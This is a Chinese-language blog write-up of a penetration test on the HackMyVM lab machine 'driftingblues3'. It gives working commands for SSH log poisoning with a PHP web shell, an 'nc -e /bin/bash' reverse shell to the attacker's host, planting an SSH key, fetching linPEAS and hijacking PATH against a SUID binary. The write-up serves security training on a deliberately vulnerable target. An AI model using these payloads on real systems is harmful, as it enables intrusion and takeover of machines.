freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试:driftingblues3

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记一次hackmyvm综合靶场的渗透测试:driftingblues3
知非 2022-03-12 10:03:44 98728
所属地 黑龙江省

前言:

Kali攻击机:192.168.1.128

靶机:未知

信息收集阶段

1647050130_622bfd921fa40f6582364.png!small?1647050133527

nmap -A 192.168.1.3

1647050139_622bfd9b9c75b061e0426.png!small?1647050143015

开放了22端口和80端口,并且通过robots.txt中有一个不允许访问的目录!

漏洞利用阶段

http://192.168.1.3/eventadmins/

1647050154_622bfdaa1db4d41540695.png!small?1647050157392

意思就是:

ssh有问题,约翰说:它有毒,远离他,

我不知道是否他是否可以接受智力上的挑战!

请找到他,并修复他

同时,检查下这个目录/littlequeenofspades.html

兄弟!

http://192.168.1.3/littlequeenofspades.html

1647050165_622bfdb5672a8d8add0ab.png!small?1647050168807

太长了,不翻译了!最后一句好像说把首字母加一起!

NMEIEWEMBNOL,其实没用!

查一下源代码!有一段base64编码!

1647050214_622bfde65876c7314ebc8.png!small?1647050217664

aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

1647050219_622bfdebe6777ae4d5bb8.png!small?1647050223265

最后给一个地址:http://192.168.1.3/adminsfixit.php

1647050225_622bfdf194e5864e2dfe4.png!small?1647050228924

查看源码,可以看到是ssh的登录日志:

1647050344_622bfe68565350ed8527a.png!small?1647050347910

通过登录日志可以看到登录用户名显示在日志中,如果你采用ssh登录时,将登录格式中的用户名修改为php一句话执行代码就会实现系统命令执行漏洞。

正常ssh登录:

ssh root@192.168.1.3

攻击代码ssh登录:

ssh '<?php system($_GET[“c”]);?>'@192.168.1.3

1647050352_622bfe70d360727b561f6.png!small?1647050356190

构造命令执行链接:

http://192.168.1.3/adminsfixit.php?c=pwd

1647050376_622bfe880baffa4a6f918.png!small?1647050379305

成功回显!!!

http://192.168.1.3/adminsfixit.php?c=ls%20-al

1647050381_622bfe8dcc5341d1812b3.png!small?1647050385111

由于可以执行系统命令,我们可以直接把bash送出去!

192.168.1.3/adminsfixit.php?c=nc 10.0.2.15 4444 -e /bin/bash

然后,我们在kali上监听下这个端口:

1647050388_622bfe948ab9e5cdfc301.png!small?1647050391864

访问下:

http://192.168.1.3/adminsfixit.php?c=nc%20192.168.1.128%204444%20-e%20/bin/bash

1647050395_622bfe9b42f124387fa05.png!small?1647050398570

1647050405_622bfea586297d7827548.png!small?1647050408812

权限提升阶段

我们这里需要获得root和robertj的权限:

我们这里发现,我们具有进入robertj账户的权限:

1647050424_622bfeb87ee7a6767b176.png!small?1647050427919

flag文件没有权限,但是.ssh文件具有完全的权限,所有我们可以把公钥文件放入这个文件夹,进行登录!

1647050430_622bfebe0cbe512b62372.png!small?1647050433366

1647050435_622bfec312311e3e47cfe.png!small?1647050438427

采用kali的密钥进行登录:

ssh robertj@192.168.1.3 -i .ssh/id_rsa

1647050445_622bfecd92cf5dce68cf5.png!small?1647050449088

获取了第一个flag:

1647050450_622bfed2533ce4b75cc41.png!small?1647050453629

413fc08d*****************9040b0280

接着就需要把权限提升到root!

这里需要用到一个linux提权脚本!

这个脚本可以枚举linux操作系统几乎所有的可提权项,甚至可以通过su暴力破解本地密码。

下载地址:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

这里我们在kaliLinux,开一个HTTPserver:

1647050457_622bfed9421c7ea4ea760.png!small?1647050460523

wget http://192.168.1.128:8000/linpeas.sh

chmod +x linpeas.sh

1647050462_622bfede4257c10a49691.png!small?1647050465582

./linpeas.sh | tee output

cat output | grep SUID

1647050468_622bfee44a757efd9e935.png!small?1647050471592

接着就是最常用的查找SUID的命令:

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

1647050473_622bfee95555e7ec5f632.png!small?1647050477256

我们看下这个文件中有啥?

1647050478_622bfeee544f5247b1467.png!small?1647050481730

执行的ip addr,cat /etc/hosts和uname -a命令:

1647050484_622bfef441e3627dff79f.png!small?1647050487586

这样的话,我们在/tmp路径中增加一个名叫ip的二进制制程序。

1647050492_622bfefc890d18633a2a5.png!small?1647050495839

export PATH=/tmp/:$PATH  //把/tmp路径加入到系统路径中。

1647050496_622bff00a46528519c996.png!small?1647050500179

可以看到/tmp加入到最前面,所以执行ip时会优先搜索这个目录:

cd /tmp                                  //切换到tmp路径中

echo '/bin/bash' > ip            //把/bin/bash写入到ip中。

chmod +x ip                         //增加执行权限

/usr/bin/getinfo

提权成功:

1647050503_622bff075cc776f571958.png!small?1647050506718

最终的flag,已经获取完毕!

1647050508_622bff0cc489a685148e8.png!small?1647050512125

root@driftingblues:/root# cat root.txt

dfb7******************19b35ec83

完成,有啥问题评论区留言,欢迎共同交流,共同进步!

# 渗透测试 # web安全 # CTF # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hackmyvm靶场实战
相关推荐
工具集 | nmap 篇
工具集 | nmap 篇

工具

Nmap(网络映射器)是一款用于网络发现和安全审计的网络安全工具,它是自由软件。

THELEIT

228156围观  · 3收藏  · 83喜欢 2022-03-14

Jackson远程代码执行漏洞(CVE-2020-36180)本地复现及踩坑记录 原创
Jackson远程代码执行漏洞(CVE-2020-36180)本地复现及踩坑记录

漏洞

Jackson漏洞CVE-2020-36180本地复现及踩坑记录

Artio

438791围观  · 9喜欢 2022-03-14

HIPAA合规SSL数字证书是什么?
HIPAA合规SSL数字证书是什么?

资讯

随着数字化的广泛应用,SSL数字证书已成为网络不可或缺的一部分,保护敏感数据通信和用户隐私比以往任何时候都更加重要

Mesign

66625围观 2022-03-14

NFC竟也存在高危漏洞?看它如何分析(CVE-2021-0870)
NFC竟也存在高危漏洞?看它如何分析(CVE-2021-0870)

基础安全

NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片...

Moyun墨云科技

370827围观  · 3收藏  · 4喜欢 2022-03-23

SQL注入点判断及注入方式
SQL注入点判断及注入方式

Web安全

&lt;h2 id=&quot;h2-1&quot;&gt;SQL注入类型&lt;/h2&gt;&lt;p&gt;&lt;strong&gt...

LemonUCKJ

99163围观 2022-03-14

知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-warez
2022-04-27
文章目录
前言:
    信息收集阶段
      漏洞利用阶段
        权限提升阶段